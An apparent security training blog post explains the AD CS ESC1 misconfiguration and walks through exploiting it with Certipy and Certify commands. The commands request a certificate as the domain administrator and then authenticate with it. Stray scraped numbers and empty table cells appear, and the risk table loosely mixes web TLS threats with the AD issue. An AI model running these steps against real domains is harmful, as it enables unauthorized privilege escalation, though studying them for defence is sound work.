What is the Subject Alternative Name (SAN)?

Arbitrary Subject Alternative Name (SAN) vulnerability is a security concern related to the X.509 certificate standard used in the Transport Layer Security (TLS) protocol.

The Subject Alternative Name field in a certificate allows multiple hostnames to be associated with a single public key.

15890 137378315890

This is particularly useful in scenarios where a server may have multiple domain names or subdomains.

AD CS ESC1 – Security Risks

Active Directory Certificate Services (AD CS) is crucial for providing public key infrastructure (PKI) functionalities, but it harbors security risks.

Significant among these is the escalation of privileges through misconfigurations, allowing attackers to issue fraudulent certificates or impersonate users.

15890 137378315890

Additionally, the complexity and maintenance requirements of AD CS make it vulnerable to emerging threats if not properly monitored and updated.

Security RiskDescription
Man-in-the-Middle AttacksAttackers can exploit the vulnerability to intercept and modify communication between users and the affected server, compromising the confidentiality and integrity of the transmitted data.
Phishing AttacksMalicious actors may use a certificate with an arbitrary SAN to impersonate a legitimate website, tricking users into providing sensitive information, leading to potential data breaches or fraud.
Domain HijackingBy manipulating the SAN field, attackers might attempt to take control of a domain or subdomain associated with the certificate, posing a threat to the availability and integrity of online services.
Unauthorized AccessAn exploited SAN vulnerability can potentially lead to unauthorized access to sensitive systems or information, compromising the overall security posture of the affected network or infrastructure.

ESC1 Requirements

ReqDescription
ENROLLEE_SUPPLIES_SUBJECT
Manual approvals disable
Authorization signatures
Enrollment Rights

List of necessary EKUs

EKUOIDDescription
Client Authentication1.3.6.1.5.5.7.3.2
PKINIT Client Authentication1.3.6.1.5.2.3.4
Smart Card Logon1.3.6.1.4.1.311.20.2.2
Any Purpose2.5.29.37.0
no EKUSubCA

Attacking Arbitrary Subject Alternative Name- ESC1

1. Find a Valid Template

certipy find -u [email protected] -p Passw0rd -dc-ip 192.168.160.5
image 1
ESC1 - Understand the Arbitrary Subject Alternative Name Vulnerability 25

2. Request Certificate as Administrator

certipy req -username [email protected] -password Passw0rd -ca corp-DC-CA -target ca.ad-attacks.local -template User -upn administrator@ad-attacks.local -dns dc.ad-attacks.local

3. Connect using the new Administrator Certificate

certipy auth -pfx Administrator.pfx -dc-ip 192.168.160.5

CBA Patch

Certify.exe request /ca:cbp-dc.protectedcb.corp\CBP-CA /template:ProtectedUserAccess /altname:administrator
/sidextension:S-1-5-21-1286082170-882298176-404569034-500 /domain:protectedcb.corp

Conclusion

The Arbitrary SAN Vulnerability poses a substantial risk to encrypted communications, potentially allowing attackers to bypass encryption safeguards.

15890 137378315890

By understanding, detecting, and preventing this vulnerability, organizations can better protect their data integrity and confidentiality in the face of evolving cyber threats.

ADCS Certified Enterprise Security Professional

15890 137378315890
AD Attacks

Sign up to receive awesome content in your inbox, every month.

We don’t spam! Read our privacy policy for more info.